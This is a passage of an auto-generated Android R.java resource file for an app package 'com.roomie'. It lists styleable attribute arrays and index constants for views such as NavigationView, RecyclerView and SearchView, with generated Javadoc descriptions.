#MenuView_android_horizontalDivider @see #MenuView_android_itemBackground @see #MenuView_android_itemIconDisabledAlpha @see #MenuView_android_itemTextAppearance @see #MenuView_android_verticalDivider @see #MenuView_android_windowAnimationStyle @see #MenuView_preserveIconSpacing @see #MenuView_subMenuArrow */ public static final int[] MenuView = { 0x010100ae, 0x0101012c, 0x0101012d, 0x0101012e, 0x0101012f, 0x01010130, 0x01010131, 0x7f0100f0, 0x7f0100f1 }; /** <p> @attr description Default background for the menu header. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#headerBackground}. @attr name android:headerBackground */ public static final int MenuView_android_headerBackground = 4; /** <p> @attr description Default horizontal divider between rows of menu items. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#horizontalDivider}. @attr name android:horizontalDivider */ public static final int MenuView_android_horizontalDivider = 2; /** <p> @attr description Default background for each menu item. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#itemBackground}. @attr name android:itemBackground */ public static final int MenuView_android_itemBackground = 5; /** <p> @attr description Default disabled icon alpha for each menu item that shows an icon. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#itemIconDisabledAlpha}. @attr name android:itemIconDisabledAlpha */ public static final int MenuView_android_itemIconDisabledAlpha = 6; /** <p> @attr description Default appearance of menu item text. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#itemTextAppearance}. @attr name android:itemTextAppearance */ public static final int MenuView_android_itemTextAppearance = 1; /** <p> @attr description Default vertical divider between menu items. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#verticalDivider}. @attr name android:verticalDivider */ public static final int MenuView_android_verticalDivider = 3; /** <p> @attr description Default animations for the menu. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#windowAnimationStyle}. @attr name android:windowAnimationStyle */ public static final int MenuView_android_windowAnimationStyle = 0; /** <p> @attr description Whether space should be reserved in layout when an icon is missing. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:preserveIconSpacing */ public static final int MenuView_preserveIconSpacing = 7; /** <p> @attr description Drawable for the arrow icon indicating a particular item is a submenu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:subMenuArrow */ public static final int MenuView_subMenuArrow = 8; /** Attributes that can be used with a NavigationView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #NavigationView_android_background android:background}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_android_fitsSystemWindows android:fitsSystemWindows}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_android_maxWidth android:maxWidth}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_elevation com.roomie:elevation}</code></td><td> Elevation for the action bar itself </td></tr> <tr><td><code>{@link #NavigationView_headerLayout com.roomie:headerLayout}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_itemBackground com.roomie:itemBackground}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_itemHorizontalPadding com.roomie:itemHorizontalPadding}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_itemIconPadding com.roomie:itemIconPadding}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_itemIconTint com.roomie:itemIconTint}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_itemTextAppearance com.roomie:itemTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_itemTextColor com.roomie:itemTextColor}</code></td><td></td></tr> <tr><td><code>{@link #NavigationView_menu com.roomie:menu}</code></td><td></td></tr> </table> @see #NavigationView_android_background @see #NavigationView_android_fitsSystemWindows @see #NavigationView_android_maxWidth @see #NavigationView_elevation @see #NavigationView_headerLayout @see #NavigationView_itemBackground @see #NavigationView_itemHorizontalPadding @see #NavigationView_itemIconPadding @see #NavigationView_itemIconTint @see #NavigationView_itemTextAppearance @see #NavigationView_itemTextColor @see #NavigationView_menu */ public static final int[] NavigationView = { 0x010100d4, 0x010100dd, 0x0101011f, 0x7f010045, 0x7f01019a, 0x7f01019b, 0x7f01019c, 0x7f01019d, 0x7f01019e, 0x7f01019f, 0x7f0101a0, 0x7f0101a1 }; /** <p>This symbol is the offset where the {@link android.R.attr#background} attribute's value can be found in the {@link #NavigationView} array. @attr name android:background */ public static final int NavigationView_android_background = 0; /** <p>This symbol is the offset where the {@link android.R.attr#fitsSystemWindows} attribute's value can be found in the {@link #NavigationView} array. @attr name android:fitsSystemWindows */ public static final int NavigationView_android_fitsSystemWindows = 1; /** <p>This symbol is the offset where the {@link android.R.attr#maxWidth} attribute's value can be found in the {@link #NavigationView} array. @attr name android:maxWidth */ public static final int NavigationView_android_maxWidth = 2; /** <p> @attr description Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:elevation */ public static final int NavigationView_elevation = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#headerLayout} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:headerLayout */ public static final int NavigationView_headerLayout = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemBackground} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:itemBackground */ public static final int NavigationView_itemBackground = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemHorizontalPadding} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemHorizontalPadding */ public static final int NavigationView_itemHorizontalPadding = 10; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemIconPadding} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemIconPadding */ public static final int NavigationView_itemIconPadding = 11; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemIconTint} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemIconTint */ public static final int NavigationView_itemIconTint = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemTextAppearance} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:itemTextAppearance */ public static final int NavigationView_itemTextAppearance = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#itemTextColor} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:itemTextColor */ public static final int NavigationView_itemTextColor = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#menu} attribute's value can be found in the {@link #NavigationView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:menu */ public static final int NavigationView_menu = 4; /** Attributes that can be used with a PopupWindow. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #PopupWindow_android_popupAnimationStyle android:popupAnimationStyle}</code></td><td></td></tr> <tr><td><code>{@link #PopupWindow_android_popupBackground android:popupBackground}</code></td><td></td></tr> <tr><td><code>{@link #PopupWindow_overlapAnchor com.roomie:overlapAnchor}</code></td><td> Whether the popup window should overlap its anchor view.</td></tr> </table> @see #PopupWindow_android_popupAnimationStyle @see #PopupWindow_android_popupBackground @see #PopupWindow_overlapAnchor */ public static final int[] PopupWindow = { 0x01010176, 0x010102c9, 0x7f0100f2 }; /** <p>This symbol is the offset where the {@link android.R.attr#popupAnimationStyle} attribute's value can be found in the {@link #PopupWindow} array. @attr name android:popupAnimationStyle */ public static final int PopupWindow_android_popupAnimationStyle = 1; /** <p>This symbol is the offset where the {@link android.R.attr#popupBackground} attribute's value can be found in the {@link #PopupWindow} array. @attr name android:popupBackground */ public static final int PopupWindow_android_popupBackground = 0; /** <p> @attr description Whether the popup window should overlap its anchor view. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:overlapAnchor */ public static final int PopupWindow_overlapAnchor = 2; /** Attributes that can be used with a PopupWindowBackgroundState. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #PopupWindowBackgroundState_state_above_anchor com.roomie:state_above_anchor}</code></td><td> State identifier indicating the popup will be above the anchor.</td></tr> </table> @see #PopupWindowBackgroundState_state_above_anchor */ public static final int[] PopupWindowBackgroundState = { 0x7f0100f3 }; /** <p> @attr description State identifier indicating the popup will be above the anchor. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:state_above_anchor */ public static final int PopupWindowBackgroundState_state_above_anchor = 0; /** Attributes that can be used with a RecycleListView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #RecycleListView_paddingBottomNoButtons com.roomie:paddingBottomNoButtons}</code></td><td> Bottom padding to use when no buttons are present.</td></tr> <tr><td><code>{@link #RecycleListView_paddingTopNoTitle com.roomie:paddingTopNoTitle}</code></td><td> Top padding to use when no title is present.</td></tr> </table> @see #RecycleListView_paddingBottomNoButtons @see #RecycleListView_paddingTopNoTitle */ public static final int[] RecycleListView = { 0x7f0100f4, 0x7f0100f5 }; /** <p> @attr description Bottom padding to use when no buttons are present. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:paddingBottomNoButtons */ public static final int RecycleListView_paddingBottomNoButtons = 0; /** <p> @attr description Top padding to use when no title is present. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:paddingTopNoTitle */ public static final int RecycleListView_paddingTopNoTitle = 1; /** Attributes that can be used with a RecyclerView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #RecyclerView_android_descendantFocusability android:descendantFocusability}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_android_orientation android:orientation}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_fastScrollEnabled com.roomie:fastScrollEnabled}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_fastScrollHorizontalThumbDrawable com.roomie:fastScrollHorizontalThumbDrawable}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_fastScrollHorizontalTrackDrawable com.roomie:fastScrollHorizontalTrackDrawable}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_fastScrollVerticalThumbDrawable com.roomie:fastScrollVerticalThumbDrawable}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_fastScrollVerticalTrackDrawable com.roomie:fastScrollVerticalTrackDrawable}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_layoutManager com.roomie:layoutManager}</code></td><td> Class name of the Layout Manager to be used.</td></tr> <tr><td><code>{@link #RecyclerView_reverseLayout com.roomie:reverseLayout}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_spanCount com.roomie:spanCount}</code></td><td></td></tr> <tr><td><code>{@link #RecyclerView_stackFromEnd com.roomie:stackFromEnd}</code></td><td></td></tr> </table> @see #RecyclerView_android_descendantFocusability @see #RecyclerView_android_orientation @see #RecyclerView_fastScrollEnabled @see #RecyclerView_fastScrollHorizontalThumbDrawable @see #RecyclerView_fastScrollHorizontalTrackDrawable @see #RecyclerView_fastScrollVerticalThumbDrawable @see #RecyclerView_fastScrollVerticalTrackDrawable @see #RecyclerView_layoutManager @see #RecyclerView_reverseLayout @see #RecyclerView_spanCount @see #RecyclerView_stackFromEnd */ public static final int[] RecyclerView = { 0x010100c4, 0x010100f1, 0x7f010006, 0x7f010007, 0x7f010008, 0x7f010009, 0x7f01000a, 0x7f01000b, 0x7f01000c, 0x7f01000d, 0x7f01000e }; /** <p>This symbol is the offset where the {@link android.R.attr#descendantFocusability} attribute's value can be found in the {@link #RecyclerView} array. @attr name android:descendantFocusability */ public static final int RecyclerView_android_descendantFocusability = 1; /** <p>This symbol is the offset where the {@link android.R.attr#orientation} attribute's value can be found in the {@link #RecyclerView} array. @attr name android:orientation */ public static final int RecyclerView_android_orientation = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fastScrollEnabled} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:fastScrollEnabled */ public static final int RecyclerView_fastScrollEnabled = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fastScrollHorizontalThumbDrawable} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:fastScrollHorizontalThumbDrawable */ public static final int RecyclerView_fastScrollHorizontalThumbDrawable = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fastScrollHorizontalTrackDrawable} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:fastScrollHorizontalTrackDrawable */ public static final int RecyclerView_fastScrollHorizontalTrackDrawable = 10; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fastScrollVerticalThumbDrawable} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:fastScrollVerticalThumbDrawable */ public static final int RecyclerView_fastScrollVerticalThumbDrawable = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#fastScrollVerticalTrackDrawable} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:fastScrollVerticalTrackDrawable */ public static final int RecyclerView_fastScrollVerticalTrackDrawable = 8; /** <p> @attr description Class name of the Layout Manager to be used. <p/> The class must extandroidx.recyclerview.widget.RecyclerViewView$LayoutManager and have either a default constructor or constructor with the signature (android.content.Context, android.util.AttributeSet, int, int). <p/> If the name starts with a '.', application package is prefixed. Else, if the name contains a '.', the classname is assumed to be a full class name. Else, the recycler view package naandroidx.appcompat.widgetdget) is prefixed. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:layoutManager */ public static final int RecyclerView_layoutManager = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#reverseLayout} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:reverseLayout */ public static final int RecyclerView_reverseLayout = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#spanCount} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:spanCount */ public static final int RecyclerView_spanCount = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#stackFromEnd} attribute's value can be found in the {@link #RecyclerView} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:stackFromEnd */ public static final int RecyclerView_stackFromEnd = 5; /** Attributes that can be used with a ScrimInsetsFrameLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ScrimInsetsFrameLayout_insetForeground com.roomie:insetForeground}</code></td><td></td></tr> </table> @see #ScrimInsetsFrameLayout_insetForeground */ public static final int[] ScrimInsetsFrameLayout = { 0x7f0101a2 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#insetForeground} attribute's value can be found in the {@link #ScrimInsetsFrameLayout} array. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". @attr name com.roomie:insetForeground */ public static final int ScrimInsetsFrameLayout_insetForeground = 0; /** Attributes that can be used with a ScrollingViewBehavior_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ScrollingViewBehavior_Layout_behavior_overlapTop com.roomie:behavior_overlapTop}</code></td><td></td></tr> </table> @see #ScrollingViewBehavior_Layout_behavior_overlapTop */ public static final int[] ScrollingViewBehavior_Layout = { 0x7f0101a3 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#behavior_overlapTop} attribute's value can be found in the {@link #ScrollingViewBehavior_Layout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:behavior_overlapTop */ public static final int ScrollingViewBehavior_Layout_behavior_overlapTop = 0; /** Attributes that can be used with a SearchView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #SearchView_android_focusable android:focusable}</code></td><td></td></tr> <tr><td><code>{@link #SearchView_android_imeOptions android:imeOptions}</code></td><td> The IME options to set on the query text field.</td></tr> <tr><td><code>{@link #SearchView_android_inputType android:inputType}</code></td><td> The input type to set on the query text field.</td></tr> <tr><td><code>{@link #SearchView_android_maxWidth android:maxWidth}</code></td><td> An optional maximum width of the SearchView.</td></tr> <tr><td><code>{@link #SearchView_closeIcon com.roomie:closeIcon}</code></td><td> Close button icon </td></tr> <tr><td><code>{@link #SearchView_commitIcon com.roomie:commitIcon}</code></td><td> Commit icon shown in the query suggestion row </td></tr> <tr><td><code>{@link #SearchView_defaultQueryHint com.roomie:defaultQueryHint}</code></td><td> Default query hint used when {@code queryHint} is undefined and the search view's {@code SearchableInfo} does not provide a hint.</td></tr> <tr><td><code>{@link #SearchView_goIcon com.roomie:goIcon}</code></td><td> Go button icon </td></tr> <tr><td><code>{@link #SearchView_iconifiedByDefault com.roomie:iconifiedByDefault}</code></td><td> The default state of the SearchView.</td></tr> <tr><td><code>{@link #SearchView_layout com.roomie:layout}</code></td><td> The layout to use for the search view.</td></tr> <tr><td><code>{@link #SearchView_queryBackground com.roomie:queryBackground}</code></td><td> Background for the section containing the search query </td></tr> <tr><td><code>{@link #SearchView_queryHint com.roomie:queryHint}</code></td><td> An optional user-defined query hint string to be displayed in the empty query field.</td></tr> <tr><td><code>{@link #SearchView_searchHintIcon com.roomie:searchHintIcon}</code></td><td> Search icon displayed as a text field hint </td></tr> <tr><td><code>{@link #SearchView_searchIcon com.roomie:searchIcon}</code></td><td> Search icon </td></tr> <tr><td><code>{@link #SearchView_submitBackground com.roomie:submitBackground}</code></td><td> Background for the section containing the action (e.</td></tr> <tr><td><code>{@link #SearchView_suggestionRowLayout com.roomie:suggestionRowLayout}</code></td><td> Layout for query suggestion rows </td></tr> <tr><td><code>{@link #SearchView_voiceIcon com.roomie:voiceIcon}</code></td><td> Voice button icon </td></tr> </table> @see #SearchView_android_focusable @see #SearchView_android_imeOptions @see #SearchView_android_inputType @see #SearchView_android_maxWidth @see #SearchView_closeIcon @see #SearchView_commitIcon @see #SearchView_defaultQueryHint @see #SearchView_goIcon @see #SearchView_iconifiedByDefault @see #SearchView_layout @see #SearchView_queryBackground @see #SearchView_queryHint @see #SearchView_searchHintIcon @see #SearchView_searchIcon @see #SearchView_submitBackground @see #SearchView_suggestionRowLayout @see #SearchView_voiceIcon */ public static final int[] SearchView = { 0x010100da, 0x0101011f, 0x01010220, 0x01010264, 0x7f0100f6, 0x7f0100f7, 0x7f0100f8, 0x7f0100f9, 0x7f0100fa, 0x7f0100fb, 0x7f0100fc, 0x7f0100fd, 0x7f0100fe, 0x7f0100ff, 0x7f010100, 0x7f010101, 0x7f010102 }; /** <p>This symbol is the offset where the {@link android.R.attr#focusable} attribute's value can be found in the {@link #SearchView} array. @attr name android:focusable */ public static final int SearchView_android_focusable = 0; /** <p> @attr description The IME options to set on the query text field. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#imeOptions}. @attr name android:imeOptions */ public static final int SearchView_android_imeOptions = 3; /** <p> @attr description The input type to set on the query text field. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#inputType}. @attr name android:inputType */ public static final int SearchView_android_inputType = 2; /** <p> @attr description An optional maximum width of the SearchView. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#maxWidth}. @attr name android:maxWidth */ public static final int SearchView_android_maxWidth = 1; /** <p> @attr description Close button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:closeIcon */ public static final int SearchView_closeIcon = 8; /** <p> @attr description Commit icon shown in the query suggestion row <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:commitIcon */ public static final int SearchView_commitIcon = 13; /** <p> @attr description Default query hint used when {@code queryHint} is undefined and the search view's {@code SearchableInfo} does not provide a hint. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:defaultQueryHint */ public static final int SearchView_defaultQueryHint = 7; /** <p> @attr description Go button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:goIcon */ public static final int SearchView_goIcon = 9; /** <p> @attr description The default state of the SearchView. If true, it will be iconified when not in use and expanded when clicked. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:iconifiedByDefault */ public static final int SearchView_iconifiedByDefault = 5; /** <p> @attr description The layout to use for the search view. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:layout */ public static final int SearchView_layout = 4; /** <p> @attr description Background for the section containing the search query <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:queryBackground */ public static final int SearchView_queryBackground = 15; /** <p> @attr description An optional user-defined query hint string to be displayed in the empty query field. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:queryHint */ public static final int SearchView_queryHint = 6; /** <p> @attr description Search icon displayed as a text field hint <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:searchHintIcon */ public static final int SearchView_searchHintIcon = 11; /** <p> @attr description Search icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form 